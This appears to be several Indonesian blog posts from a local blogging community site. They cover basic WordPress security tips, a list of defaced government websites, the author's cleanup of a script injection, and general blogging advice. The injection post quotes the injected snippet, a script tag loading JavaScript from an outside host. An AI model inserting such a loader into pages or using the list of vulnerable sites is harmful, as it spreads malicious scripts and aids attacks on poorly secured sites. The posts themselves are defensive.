• Username dan password WordPress:
  Username dan password adalah kunci paling ampuh bila seseorang ingin deface website. Hindari menggunakan username admin,  karena paling banyak orang menggunakan usernamenya admin. Jadi pakailah nama selain admin untuk username anda. Begitu juga dengan password, buatlah password anda seunik mungkin. Pakailah huruf besar kecil angka dan karakter untuk password anda sulit untuk dilacak.

• Username dan password ControlPanel:
  Selain username dan password wordPress yang lebih penting adalah melindungi password ControlPanel hosting. Karena sekuat apapun password WordPress anda kalau password ControlPanel lemah, ibarat anda membuat pagar rumah setinggi dan sekuat mungkin tapi sertifikat ditaruh diluar rumah. Jadi awalnya maling tidak bisa masuk rumah, tapi malah bisa jual rumah dan tanah anda…

• Update WordPress anda:
  Dari beberapa CMS, WordPress adalah yang paling mudah untuk melakuakan Update ke versi yang lebih baru. Caranya sangat mudah masuk ke http://domain.anda/wp-admin/update-core.php, lalu klik “UpdateNow.

• Update Plugin WordPress:
  Selain update WordPress lakukan juga update plugin-plugin yang terinstall di WordPress anda. Banyak plugin yang masih mengandung bug keamanan, biasanya pengembang akan menutup bug yang ada dengan update versi yang lebih baru.

• Backup DataBase dan File:
  Lakukan backup secara berkala pada WordPress anda, dengan cara masuk wp-admin, Tools-Export All Content lalu klik Download Export File. Juga lakukan backup file dan folder yang ada di wp-content, karena plugin, data image dan theme kesangan anda ada disitu.

Mungkin lima Tip Dasar WordPress diatas bisa membantu meminimalisir serangan dari tangan jahil yang selalu mengintai keamanan blog atau website anda. Sebenarnya ada enam yang terakhir adalah DOA. Karena sekuat apapun kita bentengi blog atau website kita pasti masih ada lubang. Lawong website KPU yang securitasnya dibiayai dengan mahal saja pernah kena deface dengan gambar Kanjeng ROY. Maka DOA adalah benteng terakhir dari semua alat keamanan.

Berikut adalah website-website (alahmdulillah website dilingkungan pemerintahan Ngawi tidak ada yang kena) yang dibiayai dengan mahal pake uang rakyat tapi terkena serangan hacker :

1. http://pa-sungaipenuh.go.id/index.php?start=12
2. http://www.dbriptek.ristek.go.id/cgi/penjaga.cgi?bacaforum&pengumuman&1296744150&1
3. http://bpkbpnfi.kalselprov.go.id/
4. http://widyanarifin.com/blog/bkd-ngawikab-go-id-hacked-by-khg.html
5. http://dishubinfo.baritokualakab.go.id/
6. http://www.ptun-bandaaceh.go.id/index.php?option=com_content&view=article&id=45&Itemid=1
7. http://dinaspendidikan.baritokualakab.go.id/turkish.htm
8. http://bpt.pekanbaru.go.id/images/
9. http://dprd-pekalongankab.go.id/index.php?start=2
10. http://www.kab-karimun.go.id/forum/
11. http://www.deptan.go.id/bpsdmp/admin/gambar/
12. http://bhgk.pusair-pu.go.id/
13. http://disbinmar.jabarprov.go.id/data/menu/anjing.php
14. http://www.trayek.banten.go.id/
15. http://pn-slawi.go.id/nd.php
16. http://waykanankab.bps.go.id/jundab.htm
17. http://pariwisata.garutkab.go.id/polling/images/
18. http://www.distanbunak.sulteng.go.id/
19. http://dishubkominfo.ketapangkab.go.id/
20. http://dprd-sumbawabaratkab.go.id/
21. http://www.acehbaratkab.go.id/

Semoga admin masing-masing segera tahu website mereka kena deface orang tak bertanggung jawab, sehingga cepat diperbaiki (karena sampai saat ini blm diperbaiki) dengan menambah sistem keamanan. Jika menggunakan CMS WordPress, Tip Dasar diatas bisa digunakan untuk meminimalisir kerjaan usil dari yang tidak bertanggung jawab.

Posting yang berhubungan

• Script Inject Wordpress
  Sudah lebih seminggu situs resmi Komunitas Blogger Ngawi, KotaNgawi.com, kena inject script. Awalnya saya tidak curiga karena tampilan dan fitur-fitur masih tetap berjalan normal, sampai kopdar kecil ...
• Ngeblog dengan Pintar
  Sudah setahun sejak saya join di WordPress.com, dari semenjak penghuninya secara global baru setengah juta, hingga membengkak sampai 1,5 juta seperti sekarang. Banyak blogger baru bermunculan, pun ban...
• Plugin WordPress Wajib Theme SriGati Online
  Hampir 3 bulan blog yang satu ini mangkrak, sampai-sampai lupa password :D. Sambil menjawab pertanyaan si-empu SriGati Online, tentan Plugin Wajib yang harus ada, untuk theme SriGati Online, sekaligus...
• Paguyuban Kampung Manusia
  Pesan facebook berantai dari NgawiTi yang mengatas-namakan Paguyuban Kampung Manusia dan Dhalang Poer yang datang hari ini rasanya agak janggal dan aneh, karena semua pesan diKotak masuk selama tiga...
• Kota Ngawi Kembali Disayang Google
  Sepertiga kedua bulan romadlon ini membawa berkah bagi kota ngawi, terbukti dengan kembali disayangnya KotaNgawi.Com dengan ditaruh dihalaman depan  rumahe mbah Google. Saya sendiri bingung, sejak si-...

Ternyata begitu saya coba akses wp-admin ternyata benar, yang muncul hanya white blank screen . Beberapa saat agak tegang juga, ketika saya buka page source muncul script mencurigakan di deretan paling atas, sehingga ketika kotangawi dibuka meload script dibawah ini :

<body onclick="popunder();">
<script type="text/javascript" src="http://pshaos.co.cc/querys.js">
</script></body>

Daripada susah ngotak-ngatik goleki penyebabe langsung saya timpa file wordpress yang ada di folder installasi dengan file baru. Tapi tunggu dulu.. jika anda mengalami hal ini jangan timpa file wp-config.php dan folder wp-content, sehingga anda tidak perlu install ulang wordpress anda.

Alhamdulillah setelah saya lakukan semua berjalan normal dan lancar, sehingga KotaNgawi.com sudah bisa diakses dengan mudah tur wes iso update lagi.

Posting yang berhubungan

• Kota Ngawi
  Ibarat manusia, umur satu tahun adalah masa-masa mulai belajar melangkah. melangkah untuk menggapai sesuatu, belajar melangkah yang kadang bisa jatuh, kadang bisa gleyoran, kadang bisa kejaduk kursi (...
• Undangan Seminar Blogging (bagi pemula)
  Maju-mundur rencana mengumpulkan para Blogger Pemula untuk diadakan Seminar, akhirnya terjawab. Tadi pagi di ruang auditorium telkom ngawi telah terjadi pertemuan antara berbagai pihak ada dari T...
• Tip Keamanan Dasar Pada Wordpress
  Posting tentang website Kabupaten Buol yang kena hack kemarin membuat saya bertanya, kenapa dengan mudah website di deface orang? Padahal saya yakin, pengembang membuat CMS selain agar user friendly j...
• Kota Ngawi Kembali Disayang Google
  Sepertiga kedua bulan romadlon ini membawa berkah bagi kota ngawi, terbukti dengan kembali disayangnya KotaNgawi.Com dengan ditaruh dihalaman depan  rumahe mbah Google. Saya sendiri bingung, sejak si-...
• Ganti Template Kota Ngawi
  Template ke 4 Kota Ngawi akhirnya selesai akhir ramadlan kemarin, layout dan warna merah-putih-hitam template ke-empat ini masih sama dengan template sebelumnya, tapi sebenarnya template ini ganti tot...

Harus saya akui pula kalau blogosphere saat ini sudah semakin meluas dan berkembang pesat. Hal ini berbanding lurus dengan mutu tulisan-tulisan dari para blogger baru yang semakin berkualitas dan mencerahkan sementara tulisan di blog ini ya masih segini-gini aja, gak naik-naik mutunya.

Setelah ngobrol-ngobrol dengan salah satu calon seleb blog baru beberapa hari yang lalu, saya menyadari, banyak hal yang masih bisa di-share ke blogger-blogger baru, supaya mereka bisa jadi blogger yang makin efektif dan berkualitas. Semoga tips yang saya kumpulkan dari hasil pengalaman ngeblog selama ini bisa makin memperkaya wawasan para blogger (khususnya di kotangawi.com), baik baru maupun lama.

1. Membaca Blog
Cara paling “primitif” bagi seorang blogger dalam membaca blog orang lain adalah mengetikkan url blog yang dituju, membaca satu-per-satu postingan yang ada di sana, kemudian, kalau berkenan, meninggalkan komentar di sana.
Tidak ada yang salah dengan cara itu. Akan tetapi, pertanyaannya adalah, berapa blog yang sanggup anda kunjungi dengan cara seperti itu dalam satu jamnya? Apakah topik yang dibahas relevan dengan minat anda? Apa anda yakin kalau di blog yang anda kunjungi akan ada postingan baru?

Untuk menghindari kehilangan waktu yang banyak untuk proses loading, topik yang tidak relevan dengan minat, atau ternyata belum ada postingan baru di blog-blog paporit anda, cara-cara berikut ini telah saya buktikan bisa sangat membantu :

- Gunakan RSS Reader. Menurut saya ini salah satu cara yang paling efisien dalam ngeblog. RSS Reader secara otomatis menyedot isi blog yang kita daftarkan ke aplikasi pengumpul sehingga kita bisa membaca hingga 100 ribu blog tanpa berkeringat . Ada 2 jenis RSS Reader, yang online via web, seperti Google Reader dan Bloglines, dan yang offline via aplikasi khusus. Yang offline ini sendiri ada yang berupa fasilitas di web browser, seperti fasilitas Live Bookmark di Firefox, atau di e-mail reader seperti Thunderbird. Ada pula yang berupa aplikasi yang khusus dirancang sebagai pembaca RSS, misalnya GreatNews, Snarfer dan RSSOwl.

Sejauh ini saya masih setia menggunakan GreatNews, dan memang sangat memudahkan, terutama karena aplikasi ini punya versi yang tidak perlu diinstal (download saja Zip-nya). Kita tinggal unzip ke Flash Disk, masukkan feed-feed dari blog paporit kita, klik update all, dan voila! Semua posting terbaru, plus komennya kalau anda mau, otomatis tersedot ke flash disk kita. Semuanya akan tersimpan, dan bisa dibuka kembali kala offline, kecuali gambarnya, tidak akan tersimpan.

2. Menulis Blog

Cara paling “enak” dalam menulis tentunya menggunakan editor WYSIWYG. Tapi saya justru kurang prefer menggunakan cara ini, kurang ada tantangannya aja. Karena itu saya lebih suka menggunakan editor basic dengan kode yang telanj4ng. Sekalian latihan menulis kode dengan rapih lah. Berikut kode yang sering saya gunakan.

Buat yang fakir benwit, atau yang kesulitan login ke WordPress, atau yang ingin fasilitas editor teks yang lebih powerful dari WYSIWYG, bisa mencoba ScribeFire. Tool yang dulunya bernama Performancing ini bisa kita manfaatkan untuk posting tanpa login ke WP.com. Kita tinggal masukkan username dan password kita di WP, postingan akan otomatis terkirim sesuai keinginan kita.

3. Organisasi Blogroll

Blogroll merupakan salah satu sarana navigasi dan sosialisasi yang cukup efektif dalam ngeblog. Dengan blogroll kita tidak perlu capek-capek mengetik ulang blog-blog yang biasa kita kunjungi untuk nyampah.

In some occasions, blogroll di WP terkadang suka ngaco. Saya dulu juga pernah mengalaminya. Ada baiknya juga anda membuat satu halaman khusus di kolom Pages untuk menyimpan blogroll anda, syukur-syukur kalau bisa dilengkapi foto atau avatar si empunya blog tentunya kalau anda cukup rajin atau kurang kerjaan .

4. Berkomentar

Pertama, berkomentarlah dengan santun, hwehehehe… Syukur-syukur kalau komentarnya bermutu, tidak OOT dan tidak bersifat Ad Hominem. Hindari copy paste konten secara berlebihan ke berbagai blog, terutama anda, orang bernama B Ali alias Sejati alias Hatinurani21!

Kedua, jangan nyampah sembarangan, nyampahlah di tempat yang anda yakini admin-nya setidaknya sama gilanya dengan anda . Jika tidak, saya khawatirkan ada yang tega me-mark komentar nyampah anda sebagai spam, sukseslah komen anda bakal masuk ke Akismet… *pengalaman pribadi *

Ketiga, fasilitas My Comments juga bisa anda gunakan untuk menelusuri kembali respon terhadap posting-posting yang sudah pernah anda komentari, tentunya anda tidak boleh lupa untuk login dulu kalau mau komen anda terdeteksi di fasilitas ini.

5. Lain-lain

- Jangan lupa untuk meng-unggah avatar, sebagai penanda identitas diri anda. Sebaiknya hindari penggunaan avatar makhluk bernyawa jika tidak ingin avatar anda dimutilasi jika anda berkomentar di blog-blog tertentu (tidak perlu saya link kan ?).

- Jangan lupa untuk memasukkan alamat blog anda di kolom situs pada bagian kontak anda. Kebanyakan blogger baru tidak memasukkan alamat ini sehingga saat berkomentar, url yang nampak hanya berupa “http://-/”. Kan rugi, blog anda yang bermutu jadi sulit untuk dikunjungi balik.

- MATIKAN FITUR SNAP! MENGGANGGU SAJA! *Nggak maksa sih *

- Banyak menemukan hal-hal menarik di internet? Tertarik untuk berbagi kepada dunia mengenai apa yang menarik minat anda? Gunakan saja fasilitas del.icio.us. Anda bisa membookmark situs-situs menarik temuan anda, dan berbagi dengan praktis kepada pembaca via widget RSS di sidebar anda. Saya memajangnya di bagian “People’s Writings“, yang dihubungkan langsung ke salah satu tag account saya di del.icio.us.

- Untuk memudahkan pembaca blog anda yang menggunakan RSS Reader, tolonglah untuk mengeset pengumpan sindikasi anda ke angka 50 atau 100, secukupnya saja, agar semua komentar anda bisa tertampung ke Rss Reader saya tanpa khawatir terlewat. Pun, mohon pula agar untuk setiap artikel, tampilkan Teks Penuh, agar RSS Reader tidak hanya menampilkan seucrit tulisan anda. Plus lagi, kalau bisa, seandainya posting anda tidak terlalu panjang, mohon jangan menggunakan tag more, karena tag more otomatis memotong postingan anda di RSS Reader.

Apa lagi ya? Kayaknya sudah cukup banyak deh… Nanti deh saya update lagi kalau ada hal yang terlewat.

*Hi hi hi, tipsnya basbang semua neh , tapi gpp kan? Masih banyak yang belum tahu loh…*

Posting yang berhubungan

• Tip Keamanan Dasar Pada Wordpress
  Posting tentang website Kabupaten Buol yang kena hack kemarin membuat saya bertanya, kenapa dengan mudah website di deface orang? Padahal saya yakin, pengembang membuat CMS selain agar user friendly j...
• Script Inject Wordpress
  Sudah lebih seminggu situs resmi Komunitas Blogger Ngawi, KotaNgawi.com, kena inject script. Awalnya saya tidak curiga karena tampilan dan fitur-fitur masih tetap berjalan normal, sampai kopdar kecil ...
• Kampanye Pilkada Ngawi
  Denyut PILKADA NGAWI sudah mulai terasa, hal ini ditandai dengan sudah tidak sungkan-sungkan para kandidat untuk tebar pesona. Baliho, stiker, kalender dan atribut-atribut lain sudah mulai menjamur ba...
• Load balancing versi Mikrotik
  Lanjutan dari tulisan sebelumnya… Seperti biasa tulisan saya ini sudah jadi artinya teman-teman tinggal copy paste ke terminal mikrotik, jadilah load balancing mikrotik-nya. tidak seperti tulisan say...
• ERROR! MySQL PID file could not be found!
  Mengatasi Mysql yang tidak mau dire/start/stop ********$ /etc/rc.d/init.d/mysqld re/start/stop ERROR! MySQL PID file could not be found! Starting MySQL…………………………….. ERROR! Coba matikan dengan ca...